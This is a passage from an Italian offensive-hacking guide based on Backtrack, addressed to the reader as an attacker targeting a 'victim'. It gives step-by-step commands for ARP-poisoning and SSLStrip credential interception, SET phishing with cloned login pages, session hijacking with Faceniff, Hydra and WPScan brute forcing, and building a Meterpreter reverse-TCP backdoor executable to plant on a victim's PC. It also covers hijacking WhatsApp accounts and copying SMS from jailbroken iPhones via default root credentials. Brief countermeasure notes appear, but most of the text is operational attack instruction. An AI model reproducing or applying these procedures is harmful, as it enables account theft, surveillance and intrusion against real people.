processo, il quale prende il nome di “sniffer”, poichè si “ascolta” il
traffico nel LAN, è utile per capire se c’è un intruso che è entrato
nella nostra rete e per capire cosa sta facendo. Tuttavia questo
tecnica è usata principalmente per raccogliere informazioni di altre
persone, per “invadere” la privacy e questo è un reato punibile dalla
legge. Se vogliamo studiare ancora in dettaglio la rete Locale,
possiamo utilizzare l’applicazione AutoScan
65
Come si può notare da questa immagine, l’applicazione è
interamente grafica, quindi intuitiva e semplice da utilizzare.
Una volta selezionata la periferica da utilizzare (quella con cui siete
connessi alla rete che vi interessa), AutoScan farà una scansione
della LAN e dopo poco tempo sarà possibile visionare tutte le
periferiche connesse. Le informazioni a riguardo sono tante; in
primis il tipo di dispositivo,nome della marca l’indirizzo ip (è un
codice composto da 4 serie di numeri che vanno da 0 a 255) che
identifica come raggiungerlo e le porte aperte. Quest’ultime sono
alla base per poter sfruttare alcune falle del sistema operativo.
Infatti queste porte, servono per utilizzare i vari servizi. Ecco una
tabella, tratta da Wikipedia, che identifica il tipo di porta.
Le più importanti sono la 20,21,22,23,80 e 139. Poi vedremo anche
66
qualcosa riguardo alla 443 (vedi Ettercap nei prossimi capitoli)
67
Un altro programma per ottenere informazioni sulle periferiche
connesse alla rete (si chiamano host), si chiama Nmap.
L’applicazione si usa interamente da terminale e serve
68
sostanzialmente per ottenere l’indirizzo ip dei dispositivi connessi.
Per farla funzionare, basta eseguire questi comandi da terminale:
nmap -sP -PT80 <Indirizzo ip di partenza-intervallo>
Per esempio: nmap -sP -PT80 192.168.0.1-255
Cosi facendo si scansione l’intera rete
Se invece si vuole una ricerca delle porte aperte per host,basta
digitare: nmap <indirizzo ip>
Vedi immagine successiva
Un altro programma davvero utile a riguardo a Kismet
(http://www.kismetwireless.net/); questo software è creato
appositamente per le reti Wifi e permette di ottenere molti dati a
69
riguardo. Per farlo partire basta digitare da terminale “kismet” e alla
domanda Start Kismet Server, premere yes con il tasto invio.
Oltre a Xplico, per visualizzare in chiaro le conversazioni presenti
su Facebook, è possibile farlo con un programma non presente in
Backtrack, ma disponibile su Internet.
Per trovarlo basta digitare su google borogove.py. Una volta
scaricato e copiato nella cartella root, basta aprire il terminale e
digitare il seguente comando:
python borogove.py <scheda di dire> <ip vittima> <ip rotuer>
Per esempio
python borogove.py wlan0 192.168.1.2 192.1681.1
Ora le conversazioni, sarà visualizzate sulla schermata.
70
Quando si richiede di inserire l’interfaccia di rete che si vuole
utilizzare, basta digitare quella della periferica Wifi (basta digitare
ancora un vola iwconfig da terminale per scoprire quale sia, per
esempio wlan0) Dopo aver dato il comando di invio, il programma
ricerca tutte le rete nelle circostanze, per una successiva intrusione.
Per cui invece vuole effettuare una operazione simile ma non con
Backtrack, può fare in questo modo.
Quello che sta per essere illustrato, in teoria sarebbe potuto essere
inserito nel capitolo precedentemente per la ricerca del bersaglio
per craccare una rete Wifi, però è stato inserito in questo capitolo
perchè è collegato all’operazione di analisi di una rete,
per capire ancora una volta come è composta un LAN e quindi
agire di conseguenza.
71
Se si vuole creare una mappa di tutti le reti presenti nei propri
comuni, il compito non è difficile. Ecco cosa si ha bisogno:
◦
Notebook con periferica Wifi e modulo Bluetooth
◦
Ricevitore GPS Bluetooh
◦
Un programma tra inSSIDer 2 o Kismac
◦
Google Earth per visualizzare la loro posizione
Dopo aver installato un programma tra inSSIDer 2 (per Windows) o
Kismac (per Mac os) si accende il ricevitore GPS e lo si collega al
PC seguendo la semplice procedura di aggiunta di periferica
bluetooth; una volta effettuato il collegamento si apre il programma
di “mappatura” si seleziona il modulo e la sua porta com e si preme
il tasto start. Adesso muniti di una macchina, effettuando un giro
nella zona che si vuole “descrivere” sarà possibile schedare tutte le
rete Wifi, sia protetta da password wpa2, wpa , wep, sia quelle
libere, per avere una idee di dove è possibile connettersi ad
internet, o anche solo per una curiosità statistica.
Questo processo prende il nome di wardriving.
72
Ecco un esempio di scansione con inSSIDer.
Insomma per analizzare una rete c’è davvero l’imbarazzo della
scelta.
73
74
Nei capitolo precedenti abbiamo visto come sia possibile entrare in
una rete e avere una idea delle periferiche connesse ad essa. In
questo capitolo verranno analizzate le tecniche per poter rubare le
password, che vengono utilizzate nel LAN.
Il primo programma che verrà illustrato è Ettercap
(http://ettercap.sourceforge.net/)
Questo programma è uno “sniffer” cioè intercetta i pacchetti
presenti nella rete e li analizza.
Innanzitutto, dal momento che la maggior parte dei protocolli
utilizzati per accedere ad aree riservate è SSL, bisogna fare una
piccola modifica al file di Ettercap. Per farlo basta cambiare alcuni
linee di comando. Da terminale:
nano /usr/local/etc/etter.conf
e sostituiamo
# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p
tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_on = "iptables -t nat -D PREROUTING -i %iface -p
tcp --dport %port -j REDIRECT --to-port %rport"
in
75
if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p
tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_on = "iptables -t nat -D PREROUTING -i %iface -p
tcp --dport %port -j REDIRECT --to-port %rport"
In poche parole dobbiamo togliere # dal file.
Ora siamo pronti per aprire il programma, che può essere utilizzato
sia in modalità grafica, che da terminale.
Per avviarlo digitiamo da terminale:
sudo ettercap -G
Impostiamo il programma andando in Sniff-Unified sniffing ,
selezionando la periferica che utilizziamo per connetterci alla rete.
Il passo successivo è quella di fare una scansione della rete.
76
Ora ci spostiamo nella tab Hosts e facciamo una scansione, per
visualizzare le periferiche connesse alla rete. Dopo pochi secondi,
saranno presenti tutti i dispositivi connessi alla LAN, con i relativi ip.
77
Ora selezioniamo l’indirizzo del Router (di solito è quello che finisce
con 1 come ip, nel nostro caso è 192.168.1.1) e lo impostiamo
come “add to target 1”, mentre il PC da attaccare, lo selezioniamo
come Target 2.
78
Ora andiamo in Mitim, e selezioniamo ARP poisoning, per
impostare il tipo di attacco (Man in the middle). Come ultima
operazione facciamo parte l’attacco, cliccando su Start-Sniff. Ora
aspettiamo che la vittima inserisca i dati che ci servono e il gioco è
fatto ! Il nome utente e le password, verranno mostrate nella zona
inferiore del programma. Anche questa operazione non è affatto
complicato, ma risulta essere molto pericolosa in caso la vittima sia
connessa ad una rete pubblica, dove le informazioni non sono
protette.
79
Oltre a Ettercap esiste un’altra applicazione, che si chiama
SSLStrip che svolge lo stesso tipo di attacco (Man in the Middle),
ma sfruttando un vero e proprio re-indirizzamento del traffico
generato da un PC della vittima a quello dell’attaccante. Ora
vedremo in pratica cosa dovremo fare.
Da terminale apriamo una nuova sessione e digitiamo
sudo echo 1 > /proc/sys/net/ipv4/ip_forward
(Questo serve per instradare i pacchetti), dove ip_forward è quello
del nostro PC.
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j
REDIRECT --to-port 8080
80
Questo serve per i pacchetti con cifratura, cioè quelli che sfruttano
la porta 443 e 80.
sudo arpspoof -i wlan0 ip_vittima ip_router
Ovviamente wlan0 è la periferica da cui si sta facendo l’attacco,
mentre ip_vittima e ip_router vanno sostituiti con quelle che fanno al
nostro caso.
sslstrip -a -l 8080 -w file.log
-a registra il traffico cifrato e non che proviene e viene mandato al
server
-l specifica la porta su quale SSLStrip deve stare in ascolto
-w specifica il file con estensione log dove viene salvato tutto
l'output ,nel nostro caso file.log
Per visualizzare il documento file.log, essendo scritto nella stessa
cartella in cui ci troviamo, basta digitare: cat file.log
cat è il comando usato in Linux per visualizzare il testo di un file.
Ora passeremo ad un programma più semplice da usare. Infatti
parleremo di “fake login”, termine americano che significa accesso
fasullo. Questo strumento ci permetterà di ottenere l’accesso a
molti account di posta elettronica,facebook etc... in modo davvero
semplice. In poche parole attraverso un programma presente su un
PC, simulando un sito simile all’originale, la vittima inserirà nome
utente e password, che verranno inoltre sul primo computer, mentre
81
la vittima continuerà a navigare sul sito nel quale ha inserito le
credenziali di accesso. Ora passiamo alla pratica !
Il programma da utilizza si chiama “Set” ed è presente in Backtrack.
Per avvialo basta andare in Backtrack-Exploitation Tools-Social
Engineering Tools-Social Engineering Toolkit-set.
82
Il programma si utilizza da terminale, ma risulta essere da verro
semplice da utilizzare.
Il passo successivo è quello di impostare l’attacco. Per prima cosa
si seleziona 1 e si preme invio.
Con questa scelta abbiamo indicato di utilizzare un SocialEngineering Attacksg. In seguito digitiamo 3 e invio per selezionare
Credential Harvester attack Method, Nella parte in altro del
83
terminale, ci viene mostrata una descrizione dei tipi di attacco da
utilizzare, per imparare tutte le possibili mosse, per avere piena
conoscenza di quello che si sta facendo.
Il passo successivo e quello di digitare 1 e premere invio, per
utilizzare un Web Templates già presente in Backtrack; tuttavia
possibile copiare il contenuto di un sito, digitando invece 2 (site
cloner) e scrivere il nome del sito, per esempio facebook.cok . Una
volta fatto ciò, selezioniamo il tipo di sito per cui si vuole rubare le
credenziali di accesso. Nel nostro caso faremo 4 e invio.
84
Ora è stato correttamente impostato il programma set. Il passo
successivo è quello di conoscere il l’indirizzo ip della macchina da
cui si sta facendo l’attacco; per scoprirlo facciamo iwconfig e
troveremo la nostra riposta. Ora basta indurre la vittima ad aprire un
link, contente l’indirizzo ip, mascherandolo magari con un codice
html o uno shortlink e il pc sotto attacco mostrerà sul monitor un
sito totalmente identico a quello che la vittima pensa di essere
collegata, la quale inserirà nome utente e password e il gioco è
85
fatto !
Infatti ora avremo sulla schermata del nostro terminale tutti i codice
che ci servono per poter aver accesso all’account che ci interessa !
In gioco da ragazzi ! Questo attacco è stato illustrato per poter
essere utilizzato dove la vittima si trovi nella stessa rete locale.
Tuttavia è possibile farlo anche da remoto, impostando
correttamente il PC attaccante, in modo tale da poter essere
raggiunto fuori dal LAN; impostando le porte 80 e 443 del nostro
router ( il termine di questa operazione è port forwarding) Questa
applicazione ha tantissime funzionalità, che vedremo nei prossimi
capitoli.
86
Se anche questa procedura di fake login dovesse essere
complicata, ma non lo è davvero, c’è una soluzione davvero
“spaventoso” a causa della facilità con cui sia possibile entrare in
account di Facebook. Questa applicazione è disponibile solo per
cellulare Android, è si chiama Faceniff (http://faceniff.ponury.net/). Essa
funziona solo su cellulari “rooted” cioè con i privilegi massimi per
cellulari. Per farlo basta fare una ricerca su google del programma
SuperOneClick.exe. L’applicazione funziona su qualsiasi tipo di rete
Wifi, libera o con protezione.
Una volta scaricata (è disponibile l’applicazione lite e quella al
prezzo di 4 $), basta pigiare sul tasto start e tutti gli account di
persone connesse nella stessa rete (WLAN), verranno rubati e si
potrà avere accesso a tantissimi servizi. Ecco quelli supportati:
•
87
FaceBook
•
Twitter
•
Youtube
•
Amazon
•
VKontakte
•
Tumblr
•
MySpace
•
Tuenti
•
MeinVZ/StudiVZ
•
blogger
•
Nasza-Klasa
In basso si vedranno gli account rubati e per visualizzare la parte
riservata, basta cliccare. Risulta fin troppo semplice questa
operazione !
88
Questo meccanismo funziona alla perfezione negli Hotspot pubblici,
dove le informazioni non sono sicure e pertanto è possibile
acquisire tantissime informazioni (messaggi privati e tanto altro) in
maniera semplice. Questo programma sfrutta il fatto che le sessioni
di facebook, lasciano dei”cookies” cioè dei pacchetti che
permettono di accedere più velocemente ad un sito già visionato.
Copiando questi file testo, per il server di facebook, risulterà
89
accettabile la richiesta di Faceniff per poter visualizzare un account
di Facebook, con gli stessi “cookies” e con lo stesso ip pubblico.
Tutte le procedure precedenti funzionano con qualsiasi tipo di
password; non cambia se essa è 123456 o @#é?^(/&((§*!”£&/// Il
prossima programma, invece, sfrutta un attacco bruteforce per
ottenere accesso, per esempio, alla pagine di controllo del router, di
cui non si conosce nome utente e password. Il programma di
chiama Hydra. Essa è disponibile sia da terminale, che in formato
grafico.
Dopo aver aperto l’applicazione Hydra avremo una schermata di
questo tipo. Nella prima tab, dovremo indicare l’indirizzo ip del
router da attaccare (di solito è 192.168.1.1), selezionando il tipo di
attacco (http-get) e nella tab successiva, passwords, indichiamo
dove si trova il dizionario (che abbiamo scaricato da google). Dopo
aver finito di impostarlo, basta andare nell’ultima tab, facendo
partire l’attacco bruteforce. Il tempo impiegato varia da pochi
secondi a ore o all’infinito se la password non è contenuta nel
dizionario.
90
Questa tecnica si utilizza, se la password è stata modificata rispetto
a quella di default. In caso contrario, basta sapere il modello del
router ed è possibile risalire alle credenziali d’accesso in pochi
secondi. Per avere una lista basta andare all’indirizzo
http://defaultpassword.com/, digitando la marca del modello del
Router (vedi programma autoscan)
91
Tutte le procedure elencate, funzionano in qualsiasi tipo di rete,
specialmente quelle senza fili, dove non si è costretti ad essere
vicini al router, ma anche in una zona nascosta, per poter effettuare
un attacco senza essere scoperti.
Funzionano ancora di più negli Hotspot Wifi, dove molte persone
accedono ad aree riservate con password, che sono facili da rubare
(vedi i vari programmi elencati precedentemente)
Contromisure
Ecco una serie di contromisure per evitare blindare le passowrd:
1. Proteggere la propria rete Wifi, come è stato detto nel capitolo 3
2. Utilizzare il più possibile il cavo di rete per connettersi ad
92
Internet
3. Navigare su siti https, cioè cittografati
4. Usare se possibile una VPN (Virtual Private Network) evitando
così intercettazioni di pacchetti da remoto
5. Disconnettersi ogni volta che si ha finito di navigare su una
pagina protetta
6. Evitare di accedere a portali di accesso in Hotspot Wifi
Inolte per Facebook è possibile attivare una ulteriore protezione;
eccola.
Molti non sanno che Facebook non sfrutta il protocollo sicuro SSL
(Secure Sockets Layer) a 128 bit, ma utilizza la normale porta 80
per connettersi al noto social network. Per dir la verità non è chiaro
perchè non venga adottato “di serie” nei profili degli utenti.
93
In ogni caso è possibile attivare questa funzionalità nella sezione
“impostazioni account”-protezione-navigazione protetta e bisogna
attivarla. In questo modo è possibile navigare in sicurezza sul noto
social network, in modo che il traffico non venga intercettato da
possibili cracker, specialmente in posti pubblici (vedi hotspost wifi).
In ogni caso conviene controllare che il sito in cui navighi
sia https://www.facebook.com
94
95
Nel capitolo 4, ho parlato più di una volta dell’importanza delle porte
di comunicazione aperte su un determinato PC connesso ad una
rete locale; In questo capitolo capirete il motivo di questa
sottolineatura. Il primo programma che vedremo si chiama
Fasttrack, raggiungibile andando in Backtrack-Exploitation ToolsNetwork Exploitation Tools-Fast-track-fasttrack ineractive.
Ora digitiamo 2, per selezionare Autopwn Automation
96
Qui abbiamo varie opzioni. Se abbiamo un unico bersaglio, basta
digitare il suo indirizzo ip di rete, seguito dal comando invio
97
Ora abbiamo due possibili scelti, “bind” e “reserve”. Queste due
configurazioni, stanno ad indicare semplicemente, se abbiamo
intenzione di collegarci noi direttamente al pc della vittima (“bind”) o
fare l’opposto, cioè fare in modo che sia lui che si connetta al nostro
dispositivo.
bind= connessione diretta al server (pc della vittima)
reverse= connessione che viene generata direttamente dall’altro
server.
Dopo qualche minuto, se l’attacco avrà avuto esito positivo, si potrà
accedere direttamente dal terminale nel pc della vittima.
98
Backdoor
Se questo attacco non fosse riuscito, è possibile eseguirne uno
simile attraverso un paylod all’interno di un comunissimo file con
estensione .exe.
Per farlo apriamo da ci spostiamo nella cartella dove è presente il
programma set.
L’opzione da digitare è 1 per selezionare un attacco di “ingegneria
sociale”
99
L’opzione da digitare è la 4, per selezionare “create a Payload and
Listener”.
100
Successivamente si digita il comando 2, per selezionare un attacco
di tipo WindwosReverse_TCP terpreter. Il termine TCP, sta ad
indicare che è un tipo ti porta che serve per comunicare, cioè
inviare i dati (ecco perchè le porte all’interno di una rete svolgono
un ruolo importante in un attacco di rete).
101
Ora creiamo un Backdoor, cioè un file che permette di eludere le
protezioni presenti in un PC. Digitiamo 16, seguito dalla porta nella
quale siamo in ascolto (443).
102
Dopo pochi instanti incomincerà a generare il file, che permetterà di
aprire le porta del PC attaccato.
103
Ora il file con estensione è stato generato e si trova nella cartella
pentest/exploits. Il nome del file è msf.exe. Ora il compito è quello
di trasferire questo file nel pc della vittima, attraverso vari modi; per
esempio fisicamente attraverso una pen drive o per posta
elettronica (non con GMAIL perchè blocca l’invio di file .exe, per
motivi di sicurezza !).
Una volta che questo file viene avviato dal PC della vittima, siamo
davvero vicino al nostro obiettivo.
Ora ci spostiamo nella cartella dove si trova l’eseguibile
./msfconsole digitando da terminale
104
cd /opt/framework/msf3
./msfconsole
Ora digitiamo:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
105
Ora selezioniamo l’indirizzo ip della vittima, digitando
semplicemente:
set lhost “indirizzo_ip_della_vittima”
106
Ora selezioniamo la porta che abbiamo indicato nella fase
precedente:
set lport 443
107
Ora diamo il comando exploit per fare partire l’ultimo attacco. Ora
siamo dentro al pc ! Sarà possibile avere una schermata e utilizzare
il terminale della vittima.
108
109
Forse l’aspetto più interessante e affascinante di Internet, che esso
stesso è una grande rete locale. In sostanza il ruolo dei “registri”,
usando un termine calcistico, viene fatto dai router. Essi hanno il
ruolo di far visitare una particolare pagina web richiesta da un pc
interno alla rete locale, con più dispositivi. Perciò il router ha il ruolo
di NAT, ovvero smista il traffico proveniente dall’esterno WAN verso
l’interno e viceversa. Quindi si è solito assegnare ip privati del tipo
192.168.x.x, mentre quelli esterni, per esempio di un sito internet
possono essere molto vari. Lo stesso router, che internamente
viene raggiunto attraverso l’ip, per esempio, 192.168.1.1, all’esterno
viene raggiunto attraverso un ip totalmente diverso. Ma come si può
ottenere un ip remoto di una persona ? Questa domanda sembra
abbastanza importante, se si pensa a gli attacchi informatici che
quotidianamente affliggono vari pc.
Nel caso volessimo conoscere l’ip pubblico della nostra
connessione, basta semplicemente digitare su google “my ip” e si
apre uno dei primi risultati e si otterrà il codice.
110
Ovviamente il codice comparirà totalmente, non come l’immagine
soprastante, oscurata per motivi di privacy. Ma se invece volessimo
sapere l’ip di un nostro amico ?
La cosa si complica leggermente, ma non troppo. La situazione
diventa semplice se quest’ultimo ha mandato un’email a noi. In
questo caso, sarà possibile ricavare l’ip. In altri casi, occorrerà
trovare qualche modo, affinché risponda ad un nostro messaggio di
posta elettronica.
Come primo passo, occorre aprire l’email in questione e cercare la
voce “mostra sorgente”, che si trova in quasi tutte le webmail. Una
111
volta copiato il testo, occorre incollarlo in questo sito: http://www.ipadress.com/trace_email/
Una volta completata la procedura, basterà premere il comando
“trace email sender”. Ora comparirà la localizzazione geografica
dell’ip in questione.
Ora sarà possibile trovare eventuale falle nel sistema, come porte
aperte, oppure modificare il firmware del router, in modo da
instradare il traffico verso un nostro server, per visualizzare alcune
informazioni.
112
Un interessante articolo tratto dal blog oversecurity, informa di una
grave falla che permette, appunto, di reindirizzare il traffico di un
utente Alice, su un server esterno.
Una nuova ed imponente vulnerabilità affligge i router di Telecom
Italia, marchiati Alice Gate AGPF, a scoprire la nuova falla è stato
Emilio Pinna del team BackBox.
La vulnerabilità permette ad un utente malintenzionato di acquisire
il pieno controllo del router in maniera permanente con gravi
conseguenza sulla privacy dell’utente, una volta acquisito l’accesso
al router l’attaccante potrà:
Intercettare i siti visitati dall’utente e redirezione verso siti copia
fasulli per rubare credenziali di mail, social network, home banking,
etc modificando i record del DNS;
Ascoltare le chiamate telefoniche, telefoni analogici compresi,
sostituendo l’indirizzo del server VoIP ufficiale con quello di uno
preparato per le intercettazioni;
Instradare tutto il traffico verso una macchina dell’attaccante allo
scopo di analizzare il traffico e sottrarre dati sensibili;
Aprire dei pannelli di controllo del router verso internet con il quale
l’attaccante mantiene l’accesso remoto al router nel tempo, con una
interfaccia web esposta verso internet e tracciata via dns dinamico.
Secondo una prima stima approssimativa sui 9 milioni di clienti di
Telecom Italia il 25% è in possesso del modem vulnerabile, circa 2
113
milioni di clienti sono vulnerabili all’attacco mettendo gravemente a
rischio la privacy degli utenti.
È possibile ottenere il pieno controllo del router grazie alla
presenza di due vulnerabilità nel software che opportunamente
sfruttate in conseguenza danno accesso ai parametri interni, in
primis il parametro HTTPstack_set della pagina admin.cgi
dell’interfaccia web permette di riscrivere qualsiasi parte della
configurazione interna del router (vulnerabilità comunemente
sfruttata dal legittimo proprietario del router per sbloccare
funzionalità nascoste).
Inoltre il router di Alice non offre nessuna protezione contro gli
attacchi CSRF: pubblicando una semplice pagina appositamente
preparata si può forzare il browser dell’utente che la visita ad
effettuare una richiesta HTTP post verso l’interfaccia web del
router.
In pratica per sferrare l’attacco è necessario effettuare una
particolare richiesta HTTP all’URLhttp://192.168.1.1/admin.cgi con
la quale è possibile riscrivere completamente la configurazione
interna del router, ipotizzando un attacco su larga scala un utente
malintenzionato potrebbe pubblicare una porzione di codice HTML
in una pagina internet molto trafficata e in poche ore trovarsi una
botnet di Router a propria disposizione.
Emilio ha reso disponibile una pagina per verificare
114
autonomamente se il proprio router Alice ADSL è vulnerabile,
inoltre per chi volesse approfondire gli aspetti tecnici è disponibile la
Full Disclosure.
115
116
Wordpress è una delle soluzioni per creare siti internet anche
professionali, più conosciuta negli ultimi anni. Grazie alla sua
facilità di utilizzo e di gestione, ha avuto un grosso successo tra
i vari bloggers di questo mondo.
In questo capitolo vedremo come è possibile eludere la sicurezza
di questo servizio, utilizzando un programma che si chiama
Digitiamo da terminale per aprire il programma wpscan;
cd /pentest/web/wpscan
L’operazione successiva è quella di scrivere:
ruby ./wpscan.rb --url ”wordpress “
dove al posto di wordpress scriviamo il sito nel quale vogliamo
entrare
117
ruby ./wpscan.rb --url wordpress --enumerate p
ruby ./wpscan.rb --url 1wordpress --enumerate u
Questi ultimi due comandi, servono essenzialmente per
conoscere tutte le possibilità vulnerabilità che sono presenti
in questo database.
Una volta finito di eseguire l’operazione da terminale, si avrà un
elenco delle possibili falle, che possono essere utilizzate per un
eventuale attacco.
Il passo successivo dipende da quello precedente, poichè per
ogni falla c’è un’operazione da fare.
Il generale è possibile effettuare un attacco brutefoce, utilizzando
un dizionario che è possibile reperire da internet. Per farlo basta
digitare:
ruby ./wpscan.rb --url wordpress --wordlist *your file* --username
*user account*
dove al posto di your file bisogna inserire l’indirizzo dove è
presente il dizionario.
118
119
WhatsApp è uno dei più famosi servizi che permette di inviare
messaggi gratuiti tra gli utenti mobile, attraverso una semplice
connessione ad Internet. Non occorre neanche effettuare una
registrazione, poiché vengono sfruttate, come credenziali, il numero
di cellulare. Sebbene a prima vista, questa soluzione sembra
“comoda”, in realtà è alla base di un importante falla di sicurezza
del servizio. La password che viene generata, non è così casuale
come sembra. Infatti essa si calcola attraverso un reverse,
semplicemente conoscendo il mac address WiFi del proprio
cellulare, oppure direttamente il codice IMEI. Quindi, se uno
riuscisse a conoscere il l’indirizzo fisico della scheda di rete, è
possibile far credere ai server di WhatsApp, di essere un’altra
persona e quindi leggere e scrivere messaggi. Ecco come si svolge
nella pratica un possibile attacco di questo tipo.
Facciamo il caso, per capire meglio i vari passaggi, che il numero di
cellulare sia 3331122334 (un numero a caso) e l’indirizzo della
scheda WiFi dell’iPhone della vittima sia AA:BB:CC:DD:EE:FF.
Come si può ottenere questo codice ?
In realtà è molto semplice, occorrono semplici programmi di
scansioni delle reti, quali NMAP e Autoscan.
Da quest’ultimo, basta vedere i dispositivi Apple presenti, per
esempio in un Hotspot pubblico e si copia il codice da qualche
parte.
Ora facciamo il “reverse” dal mac address per ottenere il codice
MD5. Usiamo per esempio questo sito online, che permette il
120
calcolo velocemente. http://www.adamek.biz/md5-generator.php
Ora per testare la vulnerabilità, basta aprire un browser con questo
link https://r.whatsapp.net/v1/exist.php?
cc=$countrycode&in=$phonenumber&udid=$password
Dove al posto di countrycode occorre inserire 39, senza + oppure
00, phonenumber è il numero telefonico, e password è quella che
abbiamo ottenuto attraverso la generazione del MD5.
Se tutto è andato bebe, troveremo una schermata simile a questa,
con la dicitura “ok”.
121
Notate immediatamente che l’esito dello stato è OK il che conferma
che avete ottenuto l’accesso al vostro account, se invece la
password generata o l’utente non è riconosciuto dal servizio di
messaggistica apparirà la dicitura FAIL.
Con la stessa identica metodologia, invio di variabili GET su PHP,
possiamo inviare messaggi ad utenti WhatsApp o verificare se ci
sono messaggi non letti. Per automatizzare la procedura ci viene in
soccorso uno script denominato WhatsAPI, che ha seguito di
direttive da parte della stessa società di messaggistica istantanea
non è più disponibile sul circuito GitHub, ma comunque attraverso
file hosting ( occorre cercare su google )
WhatsAPI ci permette quindi di testare la sicurezza di WhatsApp
rendendo possibile l’invio di messaggi e la relativa ricezione
attraverso il nostro PC anziché sullo Smartphone, lo script è di
estremo utilizzo e richiede l’installazione di PHP sulla nostra
distribuzione.
Terminato il download di WhatsAPI estraiamo il contenuto e
dirigiamoci nella cartella “test” in essa troveremo un unico file
denominato “whatsapp.php”. Apriamolo con editor di testo ed
122
inseriamo i dati, che abbiamo ottenuto nei passaggi precedenti, in
queste righe:
$nickname = “WhatsAPI Test”;
$sender = “3331122334″; // Mobile number with country code (but
without + or 00)
$imei = “AA:BB:CC:DD:EE:FF”; // MAC Address for iOS IMEI for
other platform (Android/etc)
Ora salviamo il file e apriamo da terminale il programmino
digitando:
$ php whatsapp.php
Dopo aver digitato, si aprirà l’help di questo programma, per capire
come usarlo. Noi, abbiamo varie possibilità: leggere gli sms della
vittima, oppure inviarne uno, come se fossimo la vittima !
Ovviamente è illegale tutto ciò, ma come potete vedere è davvero
semplice e non richiede troppe “skill”.
Digitiamo da terminale per leggere i messaggi
123
php whatsapp.php -i 3331122334
Ecco alcune screenshot tratte da oversecurity
Se invece voglia inviare messaggio ad un’atra persona, come se
fossimo la vittima occorre digitare:
php whatsapp.php -s “numero di cellulare ricevente” “testo del
messaggio”
124
In conclusione WhatsApp è vulnerabile, qualsiasi persona può
sostituirci in una conversazione conoscendo esclusivamente il
nostro codice IMEI. Si possono inviare e ricevere risposte senza
che il destinatario si accorga di nulla e ancor più gravoso neanche il
mittente (utente vulnerabile) avrà la ben cheminima traccia di
quanto accaduto, nella sua cronologia di chat non solo non
appariranno i messaggi inviati ma neanche quelli in risposta.
125
126
127
SMS e dati personali sott’attacco !
L’iPhone è diventato il cellulare più venduto e usato al mondo,
grazie alla sua semplicità d’utilizzo, alle sue funzionalità e alla sua
alta sicurezza ( o quasi ). A causa, però, delle rigide imposizioni da
parte di Apple sulle applicazioni presenti su AppStore, nel corso
degli anni è nato un nuovo store che si chiama Cydia. Qui è
possibile trovare tweak e applicazioni che aggiungono nuove
funzionalità al dispositivo. L’unica difficoltà per avere queste
“features” è lo sblocco del terminale. Tuttavia, seguendo le
procedure disponibili su Internet, è possibile effettuare lo sblocco
con pochi click. Tra i tweak presenti, è possibile trovare “Open
SSH”, che permette di utilizzare tale protocollo, per trasferire
facilmente grossi file, senza utilizzare iTunes. Il problema principale
di questa estensione è che durante la fase d’installazione, non è
possibile cambiare le credenziali d’accesso all’iPhone, ma
rimangono quelle di default. Solo successivamente, su volontà
dell’utente è possibile modificarle. Il pirata, dopo aver individuato se
il dispositivo è vulnerabile, accede all’iPhone con la password di
default e copia i database contenenti sms, contatti e immagini. Poi li
apre con un programmino ed è in grado di leggere praticamente
tutto ! Per fortuna è possibile rimediare a questo problema,
cambiando le credenziali d’accesso. Le screenshot si riferiscono a
programmi Windows, ma che sono sempre disponibili in Linux e
Backtrack.
Come prima operazione, il pirata utilizza un programma per trovare
le periferiche connesse ad una rete WiFi pubblica. Il software si
128
chiama NMAP ed è possibile scaricarlo da questo link. Questo
programma fa una scansione della rete WiFi a cui si è connessi e
mostra la marca delle periferiche connesse.
Ora il malintenzionato apre il programma e fa partire la scansione,
premendo il comando scan. Ora gli basta aspettare qualche istante
e troverà tutte le periferiche connesse alla rete. Si annota gli
indirizzi ip e li inserisce nella voce “target” per individuare l'iPhone.
Questo tipo d'attacco funziona anche se l'iPhone è connesso ad
Internet con il 3G. In questo caso, il pirata, cercherà di ricevere
un'email dalla vittima e copierà il sorgente del messaggio e lo
incolla in questo sito. Dopo pochi instante troverò l'indirizzo ip.
129
Ora che l'Hacker conosce l'indirizzo ip, prova a vedere se è attivo il
servizio SSH sull'iPhone, semplicemente usando sempre il
programma NMAP, dopo aver digitato l'indirizzo ip dell'iPhone sotto
la voce target. Se la porta 22 è aperta, allora l'attacco è possibile
farlo. In caso contrario, cercherà un'altra vittima.
Il pirata, dopo aver individuato l'indirizzo ip della vittima e verificato
la vulnerabilità, utilizza un programma per accedere in SSH al
dispositivo, come ad esempio CyberDuck e aggiunge il dispositivo,
attraverso il pulsante “nuova connessione”. Il nome utente e la
password sono root e alpine. Ora può vedere tutti i dati della
vittima!
130
All'interno dell'iPhone è possibile trovare tante cartelle; il pirata sa
quale sono le più importanti.
Ecco quali:
SMS
/private/var/Mobile/Library/SMS
Notes backup
/private/var/mobile/Library/Notes
Call History backup
/private/var/mobile/Library/CallHistory
Voicemail backup
/private/var/mobile/Library/Voicemail
Voicemails are stored as 1.amr, 2.amr, within this directory. The
131
custom greeting is stored as Greeting.amr
Contacts/Address Book
backup
/private/var/mobile/Library/AddressBook/
Mail backup
/private/var/mobile/Library/Mail
Pictures and Video Recordings
/private/var/mobile/Media/DCIM/
Calendar backup
/private/var/mobile/Library/Calendar/
132
Ora che il pirata ha copiato, per esempio il file sms.db, apre il
programma SQL http://www.sqlite.org/ e seleziona il file appena copiato.
Ora potrà vedere in chiaro i messaggi della vittima. Un gioco da
ragazzi per lui !
Come detto precedentemente l'attacco funziona solo se l'iPhone ha
attivo il servizio SSH e la sua passoword non è stata modificata.
Per cambiare le credenziali d'accesso, occorre aprire il terminale
133
dall'iPhone e digitare passwd e digitare la nuova parola. Ora
saremo sicuri da eventuali attacchi di questo tipo.
Come potete vedere, è facile leggere gli SMS di una persona,
sfruttando le sue disattenzione. Per altri attacchi di questo tipo, è
disponibile una sezione in Backtrack 5 R3, sotto la voce
Smartphone-Pentest-Framework.
134
135
136
L'avvento del VOIP ha segnato un grande passaggio nell'era di
Internet. Con questo servizio è possibile chiamare i principali paesi
del mondo a tariffe bassissime se non gratuitamente, direttamente
dal PC, o da Smartphone, sfruttando la “rete”. Inoltre all'estero o
anche in Italia, sfruttando i punti d'accessi Wifi presenti nei Bar,
